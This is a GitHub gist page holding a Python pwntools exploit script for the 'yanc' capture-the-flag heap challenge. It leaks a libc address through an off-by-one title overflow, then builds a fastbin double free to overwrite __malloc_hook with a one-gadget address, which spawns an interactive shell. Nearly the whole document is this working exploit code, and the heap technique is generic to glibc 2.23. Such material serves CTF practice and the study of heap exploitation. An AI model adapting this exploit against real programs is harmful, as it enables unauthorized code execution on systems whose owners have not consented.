-
-
Save yannayl/d28c802a131de1cf9eb3e90bb7d13ae4 to your computer and use it in GitHub Desktop.
yanc challenge #ins18 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.bits = 64 | |
| libc = ELF('./libc-2.23.so') | |
| main = ELF('./yanc.dbg') | |
| dbg_file = './libc-2.23.debug' | |
| notes_used = set() | |
| local = True | |
| if local: | |
| #r = main.process(env={'LD_PRELOAD' : libc.path}, aslr=False) | |
| r = main.process(env={'LD_PRELOAD' : libc.path}) | |
| else: | |
| pass | |
| def gdb_load_symbols_cmd(sym_file, elf, base): | |
| sec_str = [] | |
| for s in elf.sections: | |
| if not s.name or not s.header.sh_addr: | |
| continue | |
| sec_str.append('-s {} 0x{:x}'.format(s.name, base + s.header.sh_addr)) | |
| text_addr = elf.get_section_by_name('.text').header.sh_addr + base | |
| return 'add-symbol-file {} 0x{:x} {} \n'.format(sym_file, text_addr, ' '.join(sec_str)) | |
| def csize(n): | |
| n += 8 | |
| n += 0x10 - (n % 0x10) | |
| return max(n, 0x20) | |
| def menu(opt): | |
| r.recvuntil("4. quit") | |
| r.sendline(str(opt)) | |
| def add_note(note, title, wait=True): | |
| for i in xrange(20): | |
| if i not in notes_used: | |
| notes_used.add(i) | |
| break | |
| success(', '.join([ | |
| "add {:d}".format(i), | |
| "chunk size: {:#x}".format(csize(len(note))), | |
| 'overflow {:#x}'.format(ord(title[-1])) if len(title) > 0x20 else ''])) | |
| debug('note:\n{}\ntitle:\n{}'.format(hexdump(note), hexdump(title))) | |
| menu(1) | |
| r.recvuntil("Enter note :") | |
| r.sendline(note) | |
| if not wait: | |
| return | |
| r.recvuntil("Enter title :") | |
| title = title[:0x21] | |
| if len(title) < 0x21: | |
| r.sendline(title) | |
| else: | |
| r.send(title) | |
| def del_note(n): | |
| success("del {:d}".format(n)) | |
| menu(2) | |
| r.recvuntil("Which one :") | |
| r.sendline(str(n)) | |
| notes_used.remove(n) | |
| def view(): | |
| success("view") | |
| menu(3) | |
| lines = r.recvuntil("1. add note", drop=True).split("\n") | |
| for i, line in enumerate(lines): | |
| debug("line {:d}:\n{}".format(i, hexdump(line))) | |
| return lines | |
| db = de_bruijn() | |
| def cl(n): | |
| return ''.join([next(db) for _ in xrange(n)]) | |
| #context.log_level = "debug" | |
| add_note("", cl(0x20)) | |
| add_note(cl(0x97), cl(0x20)) | |
| add_note("", cl(0x20)) | |
| del_note(1) | |
| add_note("", cl(0x20) + '\x50') | |
| libc_leak = u64(view()[5][7:].ljust(8,'\0')) | |
| libc.address = libc_leak - 0x3c4b78 | |
| info("libc address: {:#x}".format(libc.address)) | |
| del_note(1) | |
| info("create double use chunk") | |
| add_note(cl(0x66), cl(0x20) + '\x50') | |
| info("add intermediate chunk") | |
| add_note(cl(0x66), cl(0x20)) | |
| info("create 3-length fast bin (0x70)") | |
| del_note(2) | |
| del_note(3) | |
| info("double free") | |
| del_note(1) | |
| info("point fast bin to __malloc_hook") | |
| add_note(fit({0:libc.symbols['__malloc_hook'] - 0x23}, length=0x66), cl(0x20)) | |
| info("remove from fast bin") | |
| add_note(cl(0x66), cl(0x20)) | |
| add_note(cl(0x66), cl(0x20)) | |
| info('overwrite malloc hook') | |
| ONE_GADGET = 0xf02a4 + libc.address | |
| add_note(fit({8:p64(0), 0x13:p64(ONE_GADGET)}, length=0x66), cl(0x20)) | |
| #gdb.attach(r, | |
| # gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]) + """ | |
| # set substitute-path /build/glibc-bfm8X4/ /usr/src/glibc | |
| # """ | |
| #) | |
| info("tigger one-gadget") | |
| add_note("", '', wait=False) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment